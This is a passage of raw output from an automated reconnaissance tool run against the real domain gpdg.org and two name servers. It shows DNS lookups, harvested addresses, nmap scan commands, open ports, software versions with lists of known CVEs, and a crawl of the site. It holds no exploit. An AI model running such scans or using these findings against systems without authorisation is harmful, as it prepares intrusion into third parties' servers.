742 HostName: ns4.dns26.net Type: PTR
743
744 Checking MailServers using system default resolver...
745 IP: 92.39.247.11 (France)
746 HostName: mail.gpdg.org Type: MX
747 HostName: vps2330-cloud.sd-france.net Type: PTR
748
749 Checking the zone transfer for each NS... (if this takes more than 10 seconds, just hit CTRL-C and it will continue. Bug in the libs)
750 No zone transfer found on nameserver 46.21.205.95
751 No zone transfer found on nameserver 188.130.45.112
752
753 Checking SPF record...
754 No SPF record
755
756 Checking 192 most common hostnames using system default resolver...
757 IP: 92.39.247.11 (France)
758 HostName: mail.gpdg.org Type: MX
759 HostName: vps2330-cloud.sd-france.net Type: PTR
760 HostName: www.gpdg.org. Type: A
761 IP: 92.39.247.11 (France)
762 HostName: mail.gpdg.org Type: MX
763 HostName: vps2330-cloud.sd-france.net Type: PTR
764 HostName: www.gpdg.org. Type: A
765 HostName: mail.gpdg.org. Type: A
766 IP: 92.39.247.11 (France)
767 HostName: mail.gpdg.org Type: MX
768 HostName: vps2330-cloud.sd-france.net Type: PTR
769 HostName: www.gpdg.org. Type: A
770 HostName: mail.gpdg.org. Type: A
771 HostName: webmail.gpdg.org. Type: A
772
773 Checking with nmap the reverse DNS hostnames of every <ip>/24 netblock using system default resolver...
774 Checking netblock 92.39.247.0
775 Checking netblock 46.21.205.0
776 Checking netblock 188.130.45.0
777
778 Searching for gpdg.org. emails in Google
779 gpdg@gpdg.org.
780 contact@gpdg.org.
781 publications@gpdg.org.
782 publications@gpdg.org
783
784 Checking 3 active hosts using nmap... (nmap -sn -n -v -PP -PM -PS80,25 -PA -PY -PU53,40125 -PE --reason <ip> -oA <output_directory>/nmap/<ip>.sn)
785 Host 92.39.247.11 is up (reset ttl 64)
786 Host 46.21.205.95 is up (reset ttl 64)
787 Host 188.130.45.112 is up (reset ttl 64)
788
789 Checking ports on every active host using nmap... (nmap -O --reason --webxml --traceroute -sS -sV -sC -Pn -n -v -F <ip> -oA <output_directory>/nmap/<ip>)
790 Scanning ip 92.39.247.11 (webmail.gpdg.org.):
791adjust_timeouts2: packet supposedly had rtt of -322106 microseconds. Ignoring time.
792adjust_timeouts2: packet supposedly had rtt of -322106 microseconds. Ignoring time.
793adjust_timeouts2: packet supposedly had rtt of -321739 microseconds. Ignoring time.
794adjust_timeouts2: packet supposedly had rtt of -321739 microseconds. Ignoring time.
795adjust_timeouts2: packet supposedly had rtt of -88914 microseconds. Ignoring time.
796adjust_timeouts2: packet supposedly had rtt of -88914 microseconds. Ignoring time.
797 22/tcp open ssh syn-ack ttl 48 OpenSSH 7.4 (protocol 2.0)
798 | ssh-hostkey:
799 | 2048 99:10:45:08:e5:db:22:bc:1d:6c:f1:a7:67:87:93:a7 (RSA)
800 | 256 9a:f2:bd:9d:64:f8:4a:d8:5a:5a:9e:60:bd:45:a4:f0 (ECDSA)
801 |_ 256 e1:38:2c:40:af:ec:e0:74:ea:a1:f1:61:b1:b5:ec:83 (ED25519)
802 | vulners:
803 | cpe:/a:openbsd:openssh:7.4:
804 | CVE-2018-15919 5.0 https://vulners.com/cve/CVE-2018-15919
805 |_ CVE-2017-15906 5.0 https://vulners.com/cve/CVE-2017-15906
806 53/tcp open domain syn-ack ttl 48 (unknown banner: none)
807 | dns-nsid:
808 |_ bind.version: none
809 | fingerprint-strings:
810 | DNSVersionBindReqTCP:
811 | version
812 | bind
813 |_ none
814 80/tcp open http syn-ack ttl 48 nginx
815 |_http-favicon: Parallels Plesk
816 | http-methods:
817 |_ Supported Methods: GET HEAD POST OPTIONS
818 |_http-title: Web Server's Default Page
819 106/tcp open pop3pw syn-ack ttl 48 poppassd
820 110/tcp open pop3 syn-ack ttl 48 Courier pop3d
821 |_pop3-capabilities: UIDL STLS TOP LOGIN-DELAY(10) SASL(LOGIN CRAM-MD5 CRAM-SHA1 CRAM-SHA256 PLAIN) APOP USER IMPLEMENTATION(Courier Mail Server) PIPELINING
822 |_ssl-date: TLS randomness does not represent time
823 143/tcp open imap syn-ack ttl 48 Courier Imapd (released 2017)
824 |_imap-capabilities: CAPABILITY IDLE completed AUTH=CRAM-MD5 THREAD=REFERENCES NAMESPACE STARTTLSA0001 OK QUOTA CHILDREN AUTH=PLAIN THREAD=ORDEREDSUBJECT SORT IMAP4rev1 ACL2=UNION AUTH=CRAM-SHA1 ACL AUTH=CRAM-SHA256 UIDPLUS
825 |_ssl-date: TLS randomness does not represent time
826 443/tcp open ssl/http syn-ack ttl 48 nginx
827 | http-methods:
828 |_ Supported Methods: GET HEAD POST OPTIONS
829 |_http-title: Web Server's Default Page
830 | ssl-cert: Subject: commonName=Plesk/organizationName=Plesk/countryName=CH
831 | Issuer: commonName=Plesk/organizationName=Plesk/countryName=CH
832 | Public Key type: rsa
833 | Public Key bits: 2048
834 | Signature Algorithm: sha256WithRSAEncryption
835 | Not valid before: 2019-04-01T15:36:51
836 | Not valid after: 2020-03-31T15:36:51
837 | MD5: 8927 363d c7b5 30fc 11f9 e56a 3db1 62c0
838 |_SHA-1: 5da0 817d 7f4d ecbd 7d5c 4ed1 ad84 67db 5efa aba7
839 |_ssl-date: TLS randomness does not represent time
840 | tls-alpn:
841 | h2
842 |_ http/1.1
843 | tls-nextprotoneg:
844 | h2
845 |_ http/1.1
846 465/tcp open ssl/smtps? syn-ack ttl 48
847 |_smtp-commands: Couldn't establish connection on port 465
848 |_ssl-date: TLS randomness does not represent time
849 993/tcp open ssl/imaps? syn-ack ttl 48
850 |_ssl-date: TLS randomness does not represent time
851 995/tcp open ssl/pop3s? syn-ack ttl 48
852 |_ssl-date: TLS randomness does not represent time
853 8443/tcp open ssl/http syn-ack ttl 48 sw-cp-server httpd (Plesk Onyx 17.8.11)
854 | http-methods:
855 |_ Supported Methods: GET HEAD POST
856 | http-robots.txt: 1 disallowed entry
857 |_/
858 |_http-server-header: sw-cp-server
859 |_http-title: Plesk Onyx 17.8.11
860 | ssl-cert: Subject: commonName=Plesk/organizationName=Plesk/countryName=CH
861 | Issuer: commonName=Plesk/organizationName=Plesk/countryName=CH
862 | Public Key type: rsa
863 | Public Key bits: 2048
864 | Signature Algorithm: sha256WithRSAEncryption
865 | Not valid before: 2019-04-01T15:36:51
866 | Not valid after: 2020-03-31T15:36:51
867 | MD5: 8927 363d c7b5 30fc 11f9 e56a 3db1 62c0
868 |_SHA-1: 5da0 817d 7f4d ecbd 7d5c 4ed1 ad84 67db 5efa aba7
869 |_ssl-date: TLS randomness does not represent time
870 | tls-alpn:
871 |_ http/1.1
872 | tls-nextprotoneg:
873 |_ http/1.1
874 OS Info: Service Info: Host: localhost.localdomain
875 Scanning ip 46.21.205.95 (ns4.dns26.net (PTR)):
876 53/tcp open domain syn-ack ttl 52 ISC BIND 9.9.4 (RedHat Enterprise Linux 7)
877 | dns-nsid:
878 |_ bind.version: 9.9.4-RedHat-9.9.4-38.el7_3.2
879 | vulners:
880 | cpe:/a:isc:bind:9.9.4:
881 | CVE-2015-4620 7.8 https://vulners.com/cve/CVE-2015-4620
882 | CVE-2014-8500 7.8 https://vulners.com/cve/CVE-2014-8500
883 | CVE-2017-3141 7.2 https://vulners.com/cve/CVE-2017-3141
884 | CVE-2015-8461 7.1 https://vulners.com/cve/CVE-2015-8461
885 | CVE-2013-6230 6.8 https://vulners.com/cve/CVE-2013-6230
886 | CVE-2015-1349 5.4 https://vulners.com/cve/CVE-2015-1349
887 | CVE-2018-5740 5.0 https://vulners.com/cve/CVE-2018-5740
888 | CVE-2017-3145 5.0 https://vulners.com/cve/CVE-2017-3145
889 | CVE-2016-9131 5.0 https://vulners.com/cve/CVE-2016-9131
890 | CVE-2016-8864 5.0 https://vulners.com/cve/CVE-2016-8864
891 | CVE-2016-1286 5.0 https://vulners.com/cve/CVE-2016-1286
892 | CVE-2015-8000 5.0 https://vulners.com/cve/CVE-2015-8000
893 | CVE-2019-6465 4.3 https://vulners.com/cve/CVE-2019-6465
894 | CVE-2018-5743 4.3 https://vulners.com/cve/CVE-2018-5743
895 | CVE-2018-5742 4.3 https://vulners.com/cve/CVE-2018-5742
896 | CVE-2017-3143 4.3 https://vulners.com/cve/CVE-2017-3143
897 | CVE-2017-3142 4.3 https://vulners.com/cve/CVE-2017-3142
898 | CVE-2017-3136 4.3 https://vulners.com/cve/CVE-2017-3136
899 | CVE-2016-2775 4.3 https://vulners.com/cve/CVE-2016-2775
900 | CVE-2016-1285 4.3 https://vulners.com/cve/CVE-2016-1285
901 | CVE-2018-5741 4.0 https://vulners.com/cve/CVE-2018-5741
902 | CVE-2016-6170 4.0 https://vulners.com/cve/CVE-2016-6170
903 | CVE-2018-5745 3.5 https://vulners.com/cve/CVE-2018-5745
904 |_ CVE-2014-0591 2.6 https://vulners.com/cve/CVE-2014-0591
905 OS Info: Service Info: OS: Linux; CPE: cpe:/o:redhat:enterprise_linux:7
906 Scanning ip 188.130.45.112 (ns3.dns26.net (PTR)):
907 53/tcp open domain syn-ack ttl 51 ISC BIND 9.9.4 (RedHat Enterprise Linux 7)
908 | dns-nsid:
909 |_ bind.version: 9.9.4-RedHat-9.9.4-38.el7_3.2
910 | vulners:
911 | cpe:/a:isc:bind:9.9.4:
912 | CVE-2015-4620 7.8 https://vulners.com/cve/CVE-2015-4620
913 | CVE-2014-8500 7.8 https://vulners.com/cve/CVE-2014-8500
914 | CVE-2017-3141 7.2 https://vulners.com/cve/CVE-2017-3141
915 | CVE-2015-8461 7.1 https://vulners.com/cve/CVE-2015-8461
916 | CVE-2013-6230 6.8 https://vulners.com/cve/CVE-2013-6230
917 | CVE-2015-1349 5.4 https://vulners.com/cve/CVE-2015-1349
918 | CVE-2018-5740 5.0 https://vulners.com/cve/CVE-2018-5740
919 | CVE-2017-3145 5.0 https://vulners.com/cve/CVE-2017-3145
920 | CVE-2016-9131 5.0 https://vulners.com/cve/CVE-2016-9131
921 | CVE-2016-8864 5.0 https://vulners.com/cve/CVE-2016-8864
922 | CVE-2016-1286 5.0 https://vulners.com/cve/CVE-2016-1286
923 | CVE-2015-8000 5.0 https://vulners.com/cve/CVE-2015-8000
924 | CVE-2019-6465 4.3 https://vulners.com/cve/CVE-2019-6465
925 | CVE-2018-5743 4.3 https://vulners.com/cve/CVE-2018-5743
926 | CVE-2018-5742 4.3 https://vulners.com/cve/CVE-2018-5742
927 | CVE-2017-3143 4.3 https://vulners.com/cve/CVE-2017-3143
928 | CVE-2017-3142 4.3 https://vulners.com/cve/CVE-2017-3142
929 | CVE-2017-3136 4.3 https://vulners.com/cve/CVE-2017-3136
930 | CVE-2016-2775 4.3 https://vulners.com/cve/CVE-2016-2775
931 | CVE-2016-1285 4.3 https://vulners.com/cve/CVE-2016-1285
932 | CVE-2018-5741 4.0 https://vulners.com/cve/CVE-2018-5741
933 | CVE-2016-6170 4.0 https://vulners.com/cve/CVE-2016-6170
934 | CVE-2018-5745 3.5 https://vulners.com/cve/CVE-2018-5745
935 |_ CVE-2014-0591 2.6 https://vulners.com/cve/CVE-2014-0591
936 OS Info: Service Info: OS: Linux; CPE: cpe:/o:redhat:enterprise_linux:7
937 WebCrawling domain's web servers... up to 50 max links.
938
939 + URL to crawl: http://mail.gpdg.org
940 + Date: 2019-11-25
941
942 + Crawling URL: http://mail.gpdg.org:
943 + Links:
944 + Crawling http://mail.gpdg.org
945 + Searching for directories...
946 - Found: http://mail.gpdg.org/css/
947 - Found: http://mail.gpdg.org/img/
948 + Searching open folders...
949 - http://mail.gpdg.org/css/ (403 Forbidden)
950 - http://mail.gpdg.org/img/ (403 Forbidden)
951
952
953 + URL to crawl: http://webmail.gpdg.org.
954 + Date: 2019-11-25
955
956 + Crawling URL: http://webmail.gpdg.org.:
957 + Links:
958 + Crawling http://webmail.gpdg.org.
959 + Crawling http://webmail.gpdg.org./skins/larry/styles.min.css?s=1557311751 (File! Not crawling it.)
960 + Crawling http://webmail.gpdg.org./plugins/jqueryui/themes/larry/jquery-ui.css?s=1557311751 (File! Not crawling it.)
961 + Crawling http://webmail.gpdg.org./skins/larry/ui.min.js?s=1557311751 (File! Not crawling it.)
962 + Crawling http://webmail.gpdg.org./program/js/jquery.min.js?s=1557311751 (File! Not crawling it.)
963 + Crawling http://webmail.gpdg.org./program/js/common.min.js?s=1557311751 (File! Not crawling it.)
964 + Crawling http://webmail.gpdg.org./program/js/app.min.js?s=1557311751 (File! Not crawling it.)
965 + Crawling http://webmail.gpdg.org./program/js/jstz.min.js?s=1557311751 (File! Not crawling it.)
966 + Crawling http://webmail.gpdg.org./plugins/jqueryui/js/jquery-ui.min.js?s=1557311751 (File! Not crawling it.)
967 + Searching for directories...
968 - Found: http://webmail.gpdg.org./skins/
969 - Found: http://webmail.gpdg.org./skins/larry/
970 - Found: http://webmail.gpdg.org./skins/larry/images/
971 - Found: http://webmail.gpdg.org./plugins/
972 - Found: http://webmail.gpdg.org./plugins/jqueryui/
973 - Found: http://webmail.gpdg.org./plugins/jqueryui/themes/
974 - Found: http://webmail.gpdg.org./plugins/jqueryui/themes/larry/
975 - Found: http://webmail.gpdg.org./program/
976 - Found: http://webmail.gpdg.org./program/js/
977 - Found: http://webmail.gpdg.org./plugins/jqueryui/js/
978 + Searching open folders...
979 - http://webmail.gpdg.org./skins/ (403 Forbidden)
980 - http://webmail.gpdg.org./skins/larry/ (403 Forbidden)
981 - http://webmail.gpdg.org./skins/larry/images/ (403 Forbidden)
982 - http://webmail.gpdg.org./plugins/ (403 Forbidden)
983 - http://webmail.gpdg.org./plugins/jqueryui/ (403 Forbidden)
984 - http://webmail.gpdg.org./plugins/jqueryui/themes/ (403 Forbidden)
985 - http://webmail.gpdg.org./plugins/jqueryui/themes/larry/ (403 Forbidden)
986 - http://webmail.gpdg.org./program/ (403 Forbidden)
987 - http://webmail.gpdg.org./program/js/ (403 Forbidden)
988 - http://webmail.gpdg.org./plugins/jqueryui/js/ (403 Forbidden)
989
990
991 + URL to crawl: http://www.gpdg.org.
992 + Date: 2019-11-25
993
994 + Crawling URL: http://www.gpdg.org.:
995 + Links:
996 + Crawling http://www.gpdg.org.
997 + Crawling http://www.gpdg.org./css/site_global.css?crc=63142993 (File! Not crawling it.)
998 + Crawling http://www.gpdg.org./css/master_master.css?crc=3965596738 (File! Not crawling it.)
999 + Crawling http://www.gpdg.org./css/index.css?crc=3879992635 (File! Not crawling it.)
1000 + Crawling http://www.gpdg.org./css/iefonts_index.css?crc=527448073 (File! Not crawling it.)
1001 + Crawling http://www.gpdg.org./assets/sense2.mp4 (File! Not crawling it.)
1002 + Crawling http://www.gpdg.org./assets/sense2.ogg (File! Not crawling it.)
1003 + Crawling http://www.gpdg.org./assets/sense2.webm (File! Not crawling it.)
1004 + Crawling http://www.gpdg.org./images/croix%20d-ordre.png?crc=476813363 (File! Not crawling it.)
1005 + Crawling http://www.gpdg.org./index.html
1006 + Crawling http://www.gpdg.org./tablet/a-propos.html?devicelock=tablet
1007 + Crawling http://www.gpdg.org./a-propos.html
1008 + Crawling http://www.gpdg.org./contact.html
1009 + Crawling http://www.gpdg.org./informations-en-anglais.html
1010 + Crawling http://www.gpdg.org./questions_reponses.html
1011 + Crawling http://www.gpdg.org./publications.html
1012 + Crawling http://www.gpdg.org./rite-ecossais-rectifie.html
1013 + Crawling http://www.gpdg.org./rite-francais.html
1014 + Crawling http://www.gpdg.org./rite-d-ecosse.html
1015 + Crawling http://www.gpdg.org./images/compas_croisee_sur_equerre.png?crc=4170424911 (File! Not crawling it.)
1016 + Crawling http://www.gpdg.org./editos.html
1017 + Crawling http://www.gpdg.org./l-historiquedeseditos.html
1018 + Crawling http://www.gpdg.org./scripts/jquery-1.8.3.min.js?crc=209076791 (File! Not crawling it.)
1019 + Crawling http://www.gpdg.org./scripts/require.js?crc=7928878 (File! Not crawling it.)
1020 + Crawling http://www.gpdg.org./tablet/css/master_master.css?crc=3791109957 (File! Not crawling it.)
1021 + Crawling http://www.gpdg.org./tablet/css/a-propos.css?crc=3933273570 (File! Not crawling it.)
1022 + Crawling http://www.gpdg.org./tablet/css/iefonts_a-propos.css?crc=4181407150 (File! Not crawling it.)
1023 + Crawling http://www.gpdg.org./tablet/a-propos.html
1024 + Crawling http://www.gpdg.org./tablet/editos.html
1025 + Crawling http://www.gpdg.org./tablet/historique-des-articles.html
1026 + Crawling http://www.gpdg.org./tablet/tablette-rer.html
1027 + Crawling http://www.gpdg.org./tablet/tablette-rf.html
1028 + Crawling http://www.gpdg.org./tablet/tablette-ree.html
1029 + Crawling http://www.gpdg.org./tablet/publications.html
1030 + Crawling http://www.gpdg.org./tablet/question-reponses.html
1031 + Crawling http://www.gpdg.org./tablet/index.html
1032 + Crawling http://www.gpdg.org./images/home_sense.png?crc=256161924 (File! Not crawling it.)
1033 + Crawling http://www.gpdg.org./tablet/contact.html
1034 + Crawling http://www.gpdg.org./images/mail_icon_qooqee-crop-u11611.png?crc=3840390695 (File! Not crawling it.)
1035 + Crawling http://www.gpdg.org./images/2017-repartion%20representations%20gpdg.png?crc=3784218708 (File! Not crawling it.)
1036 + Crawling http://www.gpdg.org./images/u11357-r.png?crc=432227617 (File! Not crawling it.)
1037 + Crawling http://www.gpdg.org./css/master_master.css?crc=4134199130 (File! Not crawling it.)
1038 + Crawling http://www.gpdg.org./css/a-propos.css?crc=80389286 (File! Not crawling it.)
1039 + Crawling http://www.gpdg.org./css/iefonts_a-propos.css?crc=4274934555 (File! Not crawling it.)
1040 + Crawling http://www.gpdg.org./auvergne.html
1041 + Crawling http://www.gpdg.org./css/contact.css?crc=3898242326 (File! Not crawling it.)
1042 + Crawling http://www.gpdg.org./css/iefonts_contact.css?crc=4274934555 (File! Not crawling it.)
1043 + Crawling http://www.gpdg.org./css/informations-en-anglais.css?crc=4179984161 (File! Not crawling it.)
1044 + Crawling http://www.gpdg.org./css/iefonts_informations-en-anglais.css?crc=4274934555 (File! Not crawling it.)
1045 + Crawling http://www.gpdg.org./scripts/html5shiv.js?crc=4241844378 (File! Not crawling it.)
1046 + Crawling http://www.gpdg.org./css/questions_reponses.css?crc=449407673 (File! Not crawling it.)
1047 + Crawling http://www.gpdg.org./css/iefonts_questions_reponses.css?crc=4274934555 (File! Not crawling it.)
1048 + Crawling http://www.gpdg.org./css/publications.css?crc=4282246218 (File! Not crawling it.)
1049 + Crawling http://www.gpdg.org./css/iefonts_publications.css?crc=4274934555 (File! Not crawling it.)
1050 + Crawling http://www.gpdg.org./css/master_les-ordres-master.css?crc=4062705519 (File! Not crawling it.)
1051 + Crawling http://www.gpdg.org./css/rite-ecossais-rectifie.css?crc=71410411 (File! Not crawling it.)
1052 + Crawling http://www.gpdg.org./css/iefonts_rite-ecossais-rectifie.css?crc=4274934555 (File! Not crawling it.)
1053 + Crawling http://www.gpdg.org./images/phenix%20copie.png?crc=305865540 (File! Not crawling it.)
1054 + Crawling http://www.gpdg.org./images/ecosse%20copie.png?crc=444926237 (File! Not crawling it.)
1055 + Crawling http://www.gpdg.org./images/r-c%20copie.png?crc=370426349 (File! Not crawling it.)
1056 + Crawling http://www.gpdg.org./css/rite-francais.css?crc=3987442710 (File! Not crawling it.)
1057 + Crawling http://www.gpdg.org./css/iefonts_rite-francais.css?crc=4274934555 (File! Not crawling it.)
1058 + Crawling http://www.gpdg.org./css/rite-d-ecosse.css?crc=3782961077 (File! Not crawling it.)
1059 + Crawling http://www.gpdg.org./css/iefonts_rite-d-ecosse.css?crc=4274934555 (File! Not crawling it.)
1060 + Crawling http://www.gpdg.org./css/editos.css?crc=174676255 (File! Not crawling it.)
1061 + Crawling http://www.gpdg.org./css/iefonts_editos.css?crc=4274934555 (File! Not crawling it.)
1062 + Crawling http://www.gpdg.org./css/l-historiquedeseditos.css?crc=3796325821 (File! Not crawling it.)
1063 + Crawling http://www.gpdg.org./images/adobestock_85829423.jpg?crc=418923260 (File! Not crawling it.)
1064 + Crawling http://www.gpdg.org./tablet/css/editos.css?crc=460822806 (File! Not crawling it.)
1065 + Crawling http://www.gpdg.org./tablet/css/historique-des-articles.css?crc=159068372 (File! Not crawling it.)
1066 + Crawling http://www.gpdg.org./tablet/css/iefonts_historique-des-articles.css?crc=4181407150 (File! Not crawling it.)
1067 + Crawling http://www.gpdg.org./tablet/css/master_les-ordres_master.css?crc=274129406 (File! Not crawling it.)
1068 + Crawling http://www.gpdg.org./tablet/css/tablette-rer.css?crc=3966483638 (File! Not crawling it.)
1069 + Crawling http://www.gpdg.org./tablet/css/iefonts_tablette-rer.css?crc=4181407150 (File! Not crawling it.)
1070 + Crawling http://www.gpdg.org./rite-francais.html?devicelock=desktop
1071 + Crawling http://www.gpdg.org./rite-d-ecosse.html?devicelock=desktop
1072 + Crawling http://www.gpdg.org./rite-ecossais-rectifie.html?devicelock=desktop
1073 + Crawling http://www.gpdg.org./tablet/css/tablette-rf.css?crc=4164107124 (File! Not crawling it.)
1074 + Crawling http://www.gpdg.org./tablet/css/iefonts_tablette-rf.css?crc=4181407150 (File! Not crawling it.)
1075 + Crawling http://www.gpdg.org./tablet/css/tablette-ree.css?crc=3965227374 (File! Not crawling it.)
1076 + Crawling http://www.gpdg.org./tablet/css/iefonts_tablette-ree.css?crc=4181407150 (File! Not crawling it.)
1077 + Crawling http://www.gpdg.org./tablet/css/publications.css?crc=3834020336 (File! Not crawling it.)
1078 + Crawling http://www.gpdg.org./tablet/css/question-reponses.css?crc=317273281 (File! Not crawling it.)
1079 + Crawling http://www.gpdg.org./tablet/css/master_fullscreen-slideshow.css?crc=4008164137 (File! Not crawling it.)
1080 + Crawling http://www.gpdg.org./tablet/css/index.css?crc=4266080035 (File! Not crawling it.)
1081 + Crawling http://www.gpdg.org./tablet/css/iefonts_index.css?crc=3766049784 (File! Not crawling it.)
1082 + Crawling http://www.gpdg.org./images/s_06.jpg?crc=4234202460 (File! Not crawling it.)
1083 + Crawling http://www.gpdg.org./images/s_07.jpg?crc=48230513 (File! Not crawling it.)
1084 + Crawling http://www.gpdg.org./images/s_05.jpg?crc=516240271 (File! Not crawling it.)
1085 + Crawling http://www.gpdg.org./images/s_02.jpg?crc=4285669048 (File! Not crawling it.)
1086 + Crawling http://www.gpdg.org./tablet/css/contact.css?crc=4293034839 (File! Not crawling it.)
1087 + Crawling http://www.gpdg.org./css/master_master.css?crc=189901343 (File! Not crawling it.)
1088 + Crawling http://www.gpdg.org./css/auvergne.css?crc=3904575264 (File! Not crawling it.)
1089 + Crawling http://www.gpdg.org./css/iefonts_auvergne.css?crc=4274934555 (File! Not crawling it.)
1090 + Crawling http://www.gpdg.org./auvergne-01.html
1091 + Crawling http://www.gpdg.org./auvergne-02.html
1092 + Crawling http://www.gpdg.org./css/auvergne-01.css?crc=522078536 (File! Not crawling it.)
1093 + Crawling http://www.gpdg.org./css/iefonts_auvergne-01.css?crc=4274934555 (File! Not crawling it.)
1094 + Crawling http://www.gpdg.org./css/auvergne-02.css?crc=3824268187 (File! Not crawling it.)
1095 + Crawling http://www.gpdg.org./css/iefonts_auvergne-02.css?crc=4274934555 (File! Not crawling it.)
1096 + Searching for directories...
1097 - Found: http://www.gpdg.org./tablet/
1098 - Found: http://www.gpdg.org./css/
1099 - Found: http://www.gpdg.org./assets/
1100 - Found: http://www.gpdg.org./images/
1101 - Found: http://www.gpdg.org./scripts/
1102 - Found: http://www.gpdg.org./tablet/css/
1103 + Searching open folders...
1104 - http://www.gpdg.org./tablet/ (No Open Folder)
1105 - http://www.gpdg.org./css/ (403 Forbidden)
1106 - http://www.gpdg.org./assets/ (403 Forbidden)
1107 - http://www.gpdg.org./images/ (403 Forbidden)
1108 - http://www.gpdg.org./scripts/ (403 Forbidden)
1109 - http://www.gpdg.org./tablet/css/ (403 Forbidden)
1110 + Crawl finished successfully.
1111----------------------------------------------------------------------
1112Summary of http://http://www.gpdg.org.
1113----------------------------------------------------------------------
1114+ Links crawled:
1115 - http://www.gpdg.org.
1116 - http://www.gpdg.org./a-propos.html
1117 - http://www.gpdg.org./auvergne-01.html
1118 - http://www.gpdg.org./auvergne-02.html
1119 - http://www.gpdg.org./auvergne.html
1120 - http://www.gpdg.org./contact.html
1121 - http://www.gpdg.org./editos.html
1122 - http://www.gpdg.org./index.html
1123 - http://www.gpdg.org./informations-en-anglais.html
1124 - http://www.gpdg.org./l-historiquedeseditos.html
1125 - http://www.gpdg.org./publications.html
1126 - http://www.gpdg.org./questions_reponses.html
1127 - http://www.gpdg.org./rite-d-ecosse.html
1128 - http://www.gpdg.org./rite-d-ecosse.html?devicelock=desktop
1129 - http://www.gpdg.org./rite-ecossais-rectifie.html
1130 - http://www.gpdg.org./rite-ecossais-rectifie.html?devicelock=desktop
1131 - http://www.gpdg.org./rite-francais.html
1132 - http://www.gpdg.org./rite-francais.html?devicelock=desktop
1133 - http://www.gpdg.org./tablet/a-propos.html
1134 - http://www.gpdg.org./tablet/a-propos.html?devicelock=tablet
1135 - http://www.gpdg.org./tablet/contact.html
1136 - http://www.gpdg.org./tablet/editos.html
1137 - http://www.gpdg.org./tablet/historique-des-articles.html
1138 - http://www.gpdg.org./tablet/index.html
1139 - http://www.gpdg.org./tablet/publications.html
1140 - http://www.gpdg.org./tablet/question-reponses.html
1141 - http://www.gpdg.org./tablet/tablette-ree.html
1142 - http://www.gpdg.org./tablet/tablette-rer.html
1143 - http://www.gpdg.org./tablet/tablette-rf.html
1144 Total links crawled: 29
1145
1146+ Links to files found:
1147 - http://www.gpdg.org./assets/sense2.mp4
1148 - http://www.gpdg.org./assets/sense2.ogg
1149 - http://www.gpdg.org./assets/sense2.webm
1150 - http://www.gpdg.org./css/a-propos.css?crc=80389286
1151 - http://www.gpdg.org./css/auvergne-01.css?crc=522078536
1152 - http://www.gpdg.org./css/auvergne-02.css?crc=3824268187
1153 - http://www.gpdg.org./css/auvergne.css?crc=3904575264
1154 - http://www.gpdg.org./css/contact.css?crc=3898242326
1155 - http://www.gpdg.org./css/editos.css?crc=174676255
1156 - http://www.gpdg.org./css/iefonts_a-propos.css?crc=4274934555
1157 - http://www.gpdg.org./css/iefonts_auvergne-01.css?crc=4274934555
1158 - http://www.gpdg.org./css/iefonts_auvergne-02.css?crc=4274934555
1159 - http://www.gpdg.org./css/iefonts_auvergne.css?crc=4274934555
1160 - http://www.gpdg.org./css/iefonts_contact.css?crc=4274934555
1161 - http://www.gpdg.org./css/iefonts_editos.css?crc=4274934555
1162 - http://www.gpdg.org./css/iefonts_index.css?crc=527448073
1163 - http://www.gpdg.org./css/iefonts_informations-en-anglais.css?crc=4274934555
1164 - http://www.gpdg.org./css/iefonts_publications.css?crc=4274934555
1165 - http://www.gpdg.org./css/iefonts_questions_reponses.css?crc=4274934555
1166 - http://www.gpdg.org./css/iefonts_rite-d-ecosse.css?crc=4274934555
1167 - http://www.gpdg.org./css/iefonts_rite-ecossais-rectifie.css?crc=4274934555
1168 - http://www.gpdg.org./css/iefonts_rite-francais.css?crc=4274934555
1169 - http://www.gpdg.org./css/index.css?crc=3879992635
1170 - http://www.gpdg.org./css/informations-en-anglais.css?crc=4179984161
1171 - http://www.gpdg.org./css/l-historiquedeseditos.css?crc=3796325821
1172 - http://www.gpdg.org./css/master_les-ordres-master.css?crc=4062705519
1173 - http://www.gpdg.org./css/master_master.css?crc=189901343
1174 - http://www.gpdg.org./css/master_master.css?crc=3965596738
1175 - http://www.gpdg.org./css/master_master.css?crc=4134199130
1176 - http://www.gpdg.org./css/publications.css?crc=4282246218
1177 - http://www.gpdg.org./css/questions_reponses.css?crc=449407673
1178 - http://www.gpdg.org./css/rite-d-ecosse.css?crc=3782961077
1179 - http://www.gpdg.org./css/rite-ecossais-rectifie.css?crc=71410411
1180 - http://www.gpdg.org./css/rite-francais.css?crc=3987442710
1181 - http://www.gpdg.org./css/site_global.css?crc=63142993
1182 - http://www.gpdg.org./images/2017-repartion%20representations%20gpdg.png?crc=3784218708
1183 - http://www.gpdg.org./images/adobestock_85829423.jpg?crc=418923260
1184 - http://www.gpdg.org./images/compas_croisee_sur_equerre.png?crc=4170424911
1185 - http://www.gpdg.org./images/croix%20d-ordre.png?crc=476813363
1186 - http://www.gpdg.org./images/ecosse%20copie.png?crc=444926237
1187 - http://www.gpdg.org./images/home_sense.png?crc=256161924
1188 - http://www.gpdg.org./images/mail_icon_qooqee-crop-u11611.png?crc=3840390695
1189 - http://www.gpdg.org./images/phenix%20copie.png?crc=305865540
1190 - http://www.gpdg.org./images/r-c%20copie.png?crc=370426349
1191 - http://www.gpdg.org./images/s_02.jpg?crc=4285669048
1192 - http://www.gpdg.org./images/s_05.jpg?crc=516240271
1193 - http://www.gpdg.org./images/s_06.jpg?crc=4234202460
1194 - http://www.gpdg.org./images/s_07.jpg?crc=48230513
1195 - http://www.gpdg.org./images/u11357-r.png?crc=432227617
1196 - http://www.gpdg.org./scripts/html5shiv.js?crc=4241844378
1197 - http://www.gpdg.org./scripts/jquery-1.8.3.min.js?crc=209076791
1198 - http://www.gpdg.org./scripts/require.js?crc=7928878
1199 - http://www.gpdg.org./tablet/css/a-propos.css?crc=3933273570
1200 - http://www.gpdg.org./tablet/css/contact.css?crc=4293034839
1201 - http://www.gpdg.org./tablet/css/editos.css?crc=460822806
1202 - http://www.gpdg.org./tablet/css/historique-des-articles.css?crc=159068372
1203 - http://www.gpdg.org./tablet/css/iefonts_a-propos.css?crc=4181407150
1204 - http://www.gpdg.org./tablet/css/iefonts_historique-des-articles.css?crc=4181407150
1205 - http://www.gpdg.org./tablet/css/iefonts_index.css?crc=3766049784
1206 - http://www.gpdg.org./tablet/css/iefonts_tablette-ree.css?crc=4181407150
1207 - http://www.gpdg.org./tablet/css/iefonts_tablette-rer.css?crc=4181407150
1208 - http://www.gpdg.org./tablet/css/iefonts_tablette-rf.css?crc=4181407150
1209 - http://www.gpdg.org./tablet/css/index.css?crc=4266080035
